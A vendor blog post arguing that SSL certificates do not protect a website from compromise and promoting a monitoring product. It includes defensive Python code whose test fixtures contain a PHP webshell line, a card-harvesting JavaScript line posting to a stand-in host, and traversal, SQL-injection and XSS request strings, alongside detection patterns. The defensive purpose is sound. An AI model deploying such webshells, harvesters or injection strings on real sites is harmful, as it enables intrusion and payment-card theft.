
Foregenix Blog

Why an SSL certificate won’t protect your website, but FGX-Web will.

Jake Dennys, 09/10/17 14:24

Having an SSL (Secure Sockets Layer) certificate on your website is important and a good thing to have. The little green padlock in the corner of the browser indicates that your website is legitimate and that any data transmitted between the website and its visitor is encrypted. It also increases consumer trust.

Despite this, most people misunderstand what protection an SSL certificate provides to a website and its visitors. Let me explain...

SSL is a system that encrypts a message between a sender and a receiver so that it cannot be read by a third party. It enables your website visitor to send their data securely to your web server, where it is received and processed. To make use of this secure communication method, your website requires an SSL certificate. You can spot an SSL-certified website because the web address begins with ‘https’ instead of ‘http’.

[Image: http.png (image taken from Comodo)]

The SSL certificate ensures that communication between your website visitor and your website is encrypted and secure. This is hugely important, but what needs to be understood is that it only protects the data whilst it is in transit.

So, what does this mean exactly?

When a customer makes a purchase in your online store, SSL encrypts the transaction data from the point where the customer types in their credit card details and hits ‘Submit’. When it reaches your web server, this information is decrypted and processed to complete the payment. If someone were to intercept the encrypted data in transit to the web server, they would not be able to use it because it is encrypted.

When a customer types their card details into the payment page on your website, they can see the numbers and information being typed into the web page. It is only once they press Submit that the data is scrambled for its journey across the internet.

[Image: SSL-1.png]

This means that if their PC has malware, someone could be harvesting the data as they type it in. SSL does not protect them from keyloggers, viruses, trojans, worms or any other kind of malware that has infected their computer. Criminals can still siphon card data from the PC regardless of the SSL certificate.

In a very similar manner, your website and your customer data are still vulnerable to criminals too. SSL provides no protection for your website beyond encrypting the transmission of data between your customer and your website. If your website has only SSL and no additional protection measures, you are leaving it wide open to a targeted attack.

If your website has been hacked and credit card harvesting malware has been planted on it, the criminals will be able to steal your customer data just as easily whether you have an SSL certificate or not.

Criminals have even found ways to create malicious websites and have them SSL-secured with genuine certificates. The idea is that visitors will be more likely to trust the website as genuine rather than seeing it for what it is: a malicious site.

Graham Edgecombe from Netcraft told SC Magazine:

"The tech industry has been telling users for years, if you want to enter credit card information on a website make sure it's got a padlock, make sure it's using SSL. But now anyone can go and get an SSL certificate for £5 or so, using minimal information, but it's verified.

All the certificate authorities (CA) will check is that you own the domain name, and that's it. Some of them don't even check that the domain may be misused. One of the rules imposed on certificate authorities is they have to give additional scrutiny to domain names that may be used for fraudulent purposes, but these rules are quite vague."

Whilst SSL encryption is important, it’s more important to take a holistic approach to your website security.

The act of securing a website can be a complex process. SSL does not stop attackers from hacking a website. It will not stop an attacker from exploiting software vulnerabilities or brute-forcing your access controls.

FGX-Web is a security solution that bakes security in to protect websites. Unlike SSL, FGX-Web actively searches your website for indicators of compromise, including credit card harvesting code, webshells, backdoors and other malware, and notifies you of their presence.

The solution provides protection and security monitoring to enable online businesses to defend against web-based attacks. Alongside this protection it also provides a wealth of analytical information, giving you clear risk profiling.

[Image: SSL2.png]

How will FGX-Web protect your website? Through FGX-Web you have access to:

An advanced web application firewall (WAF)

A WAF filters attacks out of incoming traffic before they reach your website. It examines not only the source of the traffic but also its intent: it can determine whether a request is a legitimate request for a web page or an attempted hack. If an attempted hack is detected, the attack is blocked, whereas innocent traffic passes freely.
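To make the "source and intent" idea concrete, here is an added example (written for this article, not FGX-Web's own code, whose rules and engine are not described on this page) of the decision a request filter makes in front of a web server. The rule patterns, the blocklisted network and the sample request lines are all constructed for illustration; the point it demonstrates is that the filter must decode the request the same way the origin server will, or an encoded payload slips past the rules.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed, illustrative rule set. A production WAF carries thousands of
# signatures plus anomaly scoring; these three only show the mechanics.
RULES = [
    ("path-traversal", re.compile(r"(^|/)\.\.(/|$)")),
    ("sql-injection", re.compile(r"(?i)(\bunion\b\s+\bselect\b|'\s*or\s+'?\d+'?\s*=\s*'?\d+)")),
    ("xss", re.compile(r"(?i)<\s*script\b")),
]

# Constructed source blocklist (documentation address range, not a real attacker).
BLOCKED_SOURCES = [ipaddress.ip_network("203.0.113.0/24")]


def normalise(value: str) -> str:
    """Decode percent-encoding twice so a double-encoded payload is matched in
    its plain form, and fold backslashes to slashes before the rules run."""
    decoded = unquote_plus(unquote_plus(value))
    return decoded.replace("\\", "/")


def inspect_request(target: str, client_ip: str):
    """Decide whether one request may pass to the origin web server.

    Returns ("allow", None) or ("block", reason). The source is checked first
    (who is asking), then every decoded path and query value (what they ask for).
    """
    addr = ipaddress.ip_address(client_ip)
    if any(addr in net for net in BLOCKED_SOURCES):
        return ("block", "blocklisted-source")

    parts = urlsplit(target)
    candidates = [normalise(parts.path)]
    # parse_qsl already decodes one layer; normalise() handles a second one.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates.append(normalise(value))

    for name, pattern in RULES:
        if any(pattern.search(c) for c in candidates):
            return ("block", name)
    return ("allow", None)


if __name__ == "__main__":
    # Constructed sample request targets as a reverse proxy would see them.
    samples = [
        ("/index.html", "198.51.100.7"),
        ("/images/..%2F..%2Fetc/passwd", "198.51.100.7"),
        ("/search?q=%27%20OR%20%271%27%3D%271", "198.51.100.7"),
        ("/search?q=%253Cscript%253E", "198.51.100.7"),
        ("/index.html", "203.0.113.9"),
    ]
    for target, ip in samples:
        print(ip, target, "->", inspect_request(target, ip))
```

The fourth sample is double-encoded: a filter that decodes only once sees `%3Cscript%3E`, matches nothing and forwards it, while the application's own decoding turns it back into a script tag. Decoding to the same depth as the origin server is the single most common source of WAF bypasses.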

Malware scanning

Our malware scanner runs at least once a day (the user can set it to run far more frequently) and is designed to search a website for all known forms of malware, including but not limited to:

  • Webshells
  • Credit card harvesting code
  • Backdoors
  • Spyware

Cardholder data scans

In addition to the malware scan, you also get access to a scan specifically designed to seek out stored, unprotected payment card data on your website. To reduce your risk of data compromise and to maintain PCI compliance, you cannot keep unprotected payment card data stored on your site. It is not always the case that it has been stored intentionally. Sometimes a customer puts their card information in an incorrect field, or malware stores the data in a file somewhere for later collection by the criminal. Our scan will detect this data and notify you.
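The malware scan and the cardholder data scan described in the two sections above both come down to walking the web root and matching file contents, so one added example covers both. This is illustrative code written for this article, not the FGX-Web scanner (whose signatures are not published on this page); the indicator patterns, the web-root layout and the sample file contents are constructed. The cardholder part shows the detail that separates a useful scan from a noisy one: a run of 13 to 19 digits is only reported when it passes the Luhn check, which drops order numbers and timestamps, and what is reported is masked (first six and last four digits) so the scan report itself does not become a store of unprotected card data.

```python
import os
import re

# Constructed indicator patterns, kept tiny for illustration. They flag
# candidates for analyst review and are not verdicts on their own.
MALWARE_INDICATORS = [
    ("php-eval-of-decoded-blob",
     re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(")),
    ("php-eval-of-request-input",
     re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    # A card-field read followed within 200 bytes by an outbound send is the
    # shape of a client-side harvester (legitimate checkout code can look similar).
    ("js-card-field-exfil",
     re.compile(rb"(?i)card(_?number|num)\b[\s\S]{0,200}?(XMLHttpRequest|fetch\s*\(|sendBeacon)")),
]

# 13 to 19 digits, optionally separated by spaces or dashes, not part of a longer run.
PAN_CANDIDATE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check used by all major card brands."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_pans(data: bytes) -> list:
    """Return masked (first six, last four) PANs found in data."""
    masked = []
    for m in PAN_CANDIDATE.finditer(data):
        digits = re.sub(rb"[ -]", b"", m.group()).decode()
        if luhn_ok(digits):
            masked.append(digits[:6] + "*" * (len(digits) - 10) + digits[-4:])
    return masked


def scan_content(relpath: str, data: bytes) -> list:
    """Findings for one file as (path, kind, detail) tuples."""
    findings = []
    for name, pattern in MALWARE_INDICATORS:
        if pattern.search(data):
            findings.append((relpath, "malware-indicator", name))
    for pan in find_pans(data):
        findings.append((relpath, "stored-pan", pan))
    return findings


def scan_tree(root: str) -> list:
    """Walk a web root and collect findings for every file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                findings.extend(scan_content(rel, fh.read()))
    return findings


if __name__ == "__main__":
    import tempfile
    # Constructed web root: a clean page, an obfuscated loader, a harvester-shaped
    # script, and a log file into which a card number has been written.
    files = {
        "index.php": b"<?php echo 'shop'; ?>\n",
        "wp-content/cache/x.php": b"<?php eval(base64_decode($_POST['k'])); ?>\n",
        "js/extra.js": (b"var n = document.getElementById('cardNumber').value;\n"
                        b"fetch('https://example.invalid/c', {method: 'POST', body: n});\n"),
        "logs/debug.log": b"order 1234567890123 paid with 4111 1111 1111 1111 exp 12/24\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(content)
        for finding in scan_tree(root):
            print(finding)
```

In the constructed log line the 13-digit order number fails the Luhn check and is ignored, while the test card number 4111 1111 1111 1111 (a well-known Luhn-valid test value) is reported as `411111******1111`.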

File change monitoring

Using our advanced file monitoring system, we log any and all changes made to your website. If a change is made, we alert you with the time, date and file location so that you can verify its legitimacy.
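File change monitoring of the kind described above works from a baseline: record a cryptographic hash of every file, re-walk the tree later, and report anything added, deleted or whose hash changed. The following is an added example written for this article, not FGX-Web's own monitoring system (its internals are not described on this page); the site tree it builds and the three changes it makes are constructed. It compares content hashes rather than modification times, because an intruder who plants a file can also restore the original timestamps.

```python
import hashlib
import os
import time


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> dict:
    """Map each regular file under root (relative path) to its SHA-256 and size."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            snap[rel] = {"sha256": hash_file(path), "size": os.path.getsize(path)}
    return snap


def diff_snapshots(baseline: dict, current: dict) -> list:
    """Return (event, relpath) for every file added, deleted or changed in content."""
    events = []
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            events.append(("added", rel))
        elif rel not in current:
            events.append(("deleted", rel))
        elif baseline[rel]["sha256"] != current[rel]["sha256"]:
            events.append(("modified", rel))
    return events


def format_alerts(events: list) -> list:
    """One alert line per event carrying the time, date and file location."""
    stamp = time.strftime("%Y-%m-%d %H:%M:%S")
    return [f"{stamp} {event.upper():8} {rel}" for event, rel in events]


def demo() -> list:
    """Build a constructed site tree, baseline it, make three changes, and diff."""
    import tempfile

    with tempfile.TemporaryDirectory() as root:
        def write(rel, content):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)

        write("index.php", b"<?php echo 'shop'; ?>\n")
        write("js/checkout.js", b"// checkout form handling\n")
        write("config.php", b"<?php $db = 'localhost'; ?>\n")
        baseline = snapshot(root)

        # Simulated changes: an edited script, a new file in uploads, a removed file.
        write("js/checkout.js", b"// checkout form handling\n// unexpected addition\n")
        write("uploads/cache.php", b"<?php /* file that should not be here */ ?>\n")
        os.remove(os.path.join(root, "config.php"))

        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for line in format_alerts(demo()):
        print(line)
```

The baseline itself must live somewhere the web server cannot write, otherwise whoever modifies the site can also re-baseline it; a monitoring service that holds the baseline off-host is one way to achieve that.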

Website Security Specialists to call for help

Our team of Threat Intelligence Analysts supports our FGX-Web clients on a daily basis, helping to quickly manage threats and protect websites from attacks. As an FGX-Web client, our team becomes your team.

As you can see, SSL protection is just one of the important components of website protection. The importance of having proper, effective security in place for your website cannot be overstated. Hopefully, this article has given you a better idea of what you can do to improve your website's security measures.
